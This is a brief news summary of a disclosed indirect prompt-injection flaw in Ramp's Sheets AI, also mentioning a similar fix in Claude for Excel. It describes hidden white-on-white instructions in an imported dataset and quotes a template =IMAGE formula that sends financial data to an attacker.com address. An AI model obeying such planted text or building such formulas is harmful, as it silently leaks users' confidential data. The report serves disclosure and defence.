PromptArmor disclosed an indirect prompt injection in Ramp’s Sheets AI that silently auto-inserted malicious IMAGE formulas, exfiltrating confidential financial data to an attacker’s server.
Key Takeaways
The attack hides a prompt injection in white-on-white text inside an imported external dataset, invisible to the user without inspecting cell values.
Ramp AI was manipulated into building =IMAGE("https://attacker.com/...?{victim_data}") formulas that make outbound network requests carrying financial data.
No human-in-the-loop approval existed; the malicious formula was inserted automatically, with the confidential financial model tab included by the AI.
Anthropic patched the same class of flaw in Claude for Excel with a red warning interstitial that displays full formulas before any insertion.
Ramp fixed the issue March 16, 2026, roughly 25 days after initial disclosure; delay was attributed to a transition between disclosure programs.
